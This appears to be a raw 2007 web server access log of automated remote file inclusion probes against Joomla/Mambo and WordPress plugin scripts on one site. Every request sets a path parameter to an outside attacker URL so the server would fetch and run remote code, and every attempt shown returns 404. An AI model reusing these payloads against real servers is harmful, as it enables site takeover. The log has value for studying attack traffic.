64.119.177.228 - - [21/Oct/2007:09:49:04 -0700] "GET /index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:09:49:04 -0700] "GET /logs/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:09:53:44 -0700] "GET /logs/access_070512.log/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 278 "-" "libwww-perl/5.65" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:09:56:16 -0700] "GET /logs/access_070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:09:56:16 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:09:56:16 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:09:56:20 -0700] "GET /logs/access_070612.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:09:57:47 -0700] "GET /logs/access_070712.log/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:05:46 -0700] "GET /logs/access_070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 304 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:05:46 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:05:47 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:07:51 -0700] "GET /logs/access_070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:07:52 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:07:53 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:08:12 -0700] "GET /logs/access_070612.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
61.67.192.15 - - [21/Oct/2007:10:08:33 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
61.67.192.15 - - [21/Oct/2007:10:08:33 -0700] "GET /index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 268 "-" "libwww-perl/5.803" "www.projectpr.com"
61.67.192.15 - - [21/Oct/2007:10:08:33 -0700] "GET /logs/access_%3Cwbr%20/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.75.165.84 - - [21/Oct/2007:10:10:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.v3.astrolabium.pl/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
62.75.165.84 - - [21/Oct/2007:10:10:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.v3.astrolabium.pl/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.projectpr.com"
66.230.204.130 - - [21/Oct/2007:10:11:34 -0700] "GET /logs/access_070712.log/wordtube-button.php?wpPATH=http://www.meta-k.ru/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
66.230.204.130 - - [21/Oct/2007:10:11:34 -0700] "GET /wordtube-button.php?wpPATH=http://www.meta-k.ru/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
66.230.204.130 - - [21/Oct/2007:10:11:34 -0700] "GET /logs/wordtube-button.php?wpPATH=http://www.meta-k.ru/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
61.67.192.15 - - [21/Oct/2007:10:12:25 -0700] "GET /logs/access_%3Cwbr%20/%3E070512.log/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 291 "-" "libwww-perl/5.803" "www.projectpr.com"
66.230.204.130 - - [21/Oct/2007:10:13:26 -0700] "GET /logs/access_070612.log/wordtube-button.php?wpPATH=http://www.meta-k.ru/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:15:17 -0700] "GET /logs/access_070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:15:18 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:15:18 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:15:34 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:15:34 -0700] "GET /logs/access_%3Cwbr%20/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:17:10 -0700] "GET /logs/access_%3Cwbr%20/%3E070512.log/index.php?option=com_simpleboardhttp://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:18:25 -0700] "GET /logs/access_070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:18:25 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:18:26 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:23:14 -0700] "GET /logs/access_070612.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:10:23:35 -0700] "GET /logs/access_070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:10:23:35 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 312 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:10:23:45 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 317 "-" "libwww-perl/5.65" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:24:02 -0700] "GET /logs/access_070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 304 "-" "libwww-perl/5.805" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:10:24:54 -0700] "GET /logs/access_070612.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:29:57 -0700] "GET /logs/access_%3Cwbr%20/%3E070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 348 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:29:57 -0700] "GET /logs/access_%3Cwbr%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:30:00 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:30:32 -0700] "GET /logs/access_070612.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:30:32 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:30:33 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
207.58.191.155 - - [21/Oct/2007:10:38:39 -0700] "GET /logs/access_070712.log/wordtube-button.php?wpPATH=http://r0x00k.ExoFire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.191.155 - - [21/Oct/2007:10:38:40 -0700] "GET /wordtube-button.php?wpPATH=http://r0x00k.ExoFire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.191.155 - - [21/Oct/2007:10:38:40 -0700] "GET /logs/wordtube-button.php?wpPATH=http://r0x00k.ExoFire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.191.155 - - [21/Oct/2007:10:39:22 -0700] "GET /logs/access_070612.log/wordtube-button.php?wpPATH=http://r0x00k.ExoFire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:40:15 -0700] "GET /logs/access_070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.48.196.22 - - [21/Oct/2007:10:40:49 -0700] "GET /logs/access_070712.log/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.805" "www.projectpr.com"
85.48.196.22 - - [21/Oct/2007:10:40:49 -0700] "GET /wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.48.196.22 - - [21/Oct/2007:10:40:50 -0700] "GET /logs/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:41:38 -0700] "GET /logs/access_070612.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 308 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:41:39 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:41:39 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:41:51 -0700] "GET /logs/access_070612.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:41:51 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 285 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:41:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 290 "-" "libwww-perl/5.803" "www.projectpr.com"
85.48.196.22 - - [21/Oct/2007:10:41:55 -0700] "GET /logs/access_070612.log/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:10:44:28 -0700] "GET /logs/access_070712.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.48.196.22 - - [21/Oct/2007:10:44:38 -0700] "GET /logs/access_%3Cwbr%20/%3E070712.log/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.48.196.22 - - [21/Oct/2007:10:44:39 -0700] "GET /wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.48.196.22 - - [21/Oct/2007:10:44:39 -0700] "GET /logs/access_%3Cwbr%20/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.805" "www.projectpr.com"
85.48.196.22 - - [21/Oct/2007:10:45:39 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:10:45:51 -0700] "GET /logs/access_070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:10:45:52 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:10:45:52 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:10:48:42 -0700] "GET /logs/access_070712.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
207.58.191.155 - - [21/Oct/2007:10:49:36 -0700] "GET /logs/access_070712.log/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.191.155 - - [21/Oct/2007:10:49:36 -0700] "GET /wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.191.155 - - [21/Oct/2007:10:49:36 -0700] "GET /logs/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.191.155 - - [21/Oct/2007:10:50:45 -0700] "GET /logs/access_070612.log/wordtube-button.php?wpPATH=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:57:08 -0700] "GET /logs/access_%3Cwbr%20/%3E070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:57:08 -0700] "GET /logs/access_%3Cwbr%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
81.31.151.21 - - [21/Oct/2007:10:57:08 -0700] "GET /logs/access_070712.log/wordtube-button.php?wpPATH=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 288 "-" "libwww-perl/5.805" "www.projectpr.com"
81.31.151.21 - - [21/Oct/2007:10:57:09 -0700] "GET /wordtube-button.php?wpPATH=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.31.151.21 - - [21/Oct/2007:10:57:09 -0700] "GET /logs/wordtube-button.php?wpPATH=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.62.35.165 - - [21/Oct/2007:10:57:20 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 348 "-" "libwww-perl/5.65" "www.projectpr.com"
81.31.151.21 - - [21/Oct/2007:10:58:24 -0700] "GET /logs/access_070612.log/wordtube-button.php?wpPATH=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
61.67.192.15 - - [21/Oct/2007:10:59:04 -0700] "GET /logs/access_%3Cwbr%20/%3E070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
61.67.192.15 - - [21/Oct/2007:10:59:04 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
61.67.192.15 - - [21/Oct/2007:10:59:05 -0700] "GET /logs/access_%3Cwbr%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
61.67.192.15 - - [21/Oct/2007:10:59:10 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:11:04:32 -0700] "GET /logs/access_070612.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:11:04:33 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:11:04:39 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:14:14 -0700] "GET /logs/access_070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 335 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:14:14 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:14:14 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:14:17 -0700] "GET /logs/access_070612.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.31.151.21 - - [21/Oct/2007:11:16:15 -0700] "GET /logs/access_070612.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 307 "-" "libwww-perl/5.805" "www.projectpr.com"
81.31.151.21 - - [21/Oct/2007:11:16:16 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.31.151.21 - - [21/Oct/2007:11:16:16 -0700] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:11:17:23 -0700] "GET /logs/access_070712.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
81.31.151.21 - - [21/Oct/2007:11:20:44 -0700] "GET /logs/access_070712.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 307 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.85.100 - - [21/Oct/2007:11:22:09 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 284 "-" "libwww-perl/5.803" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:23:34 -0700] "GET /logs/access_070612.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 308 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:23:34 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:23:34 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:23:42 -0700] "GET /logs/access_070712.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:24:26 -0700] "GET /logs/access_070612.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:24:26 -0700] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:24:26 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 298 "-" "libwww-perl/5.805" "www.projectpr.com"
212.124.37.50 - - [21/Oct/2007:11:24:36 -0700] "GET /logs/access_070712.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.119.177.228 - - [21/Oct/2007:11:27:59 -0700] "GET /logs/access_070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:11:28:59 -0700] "GET /logs/access_070712.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.230.24.139 - - [21/Oct/2007:11:29:00 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=h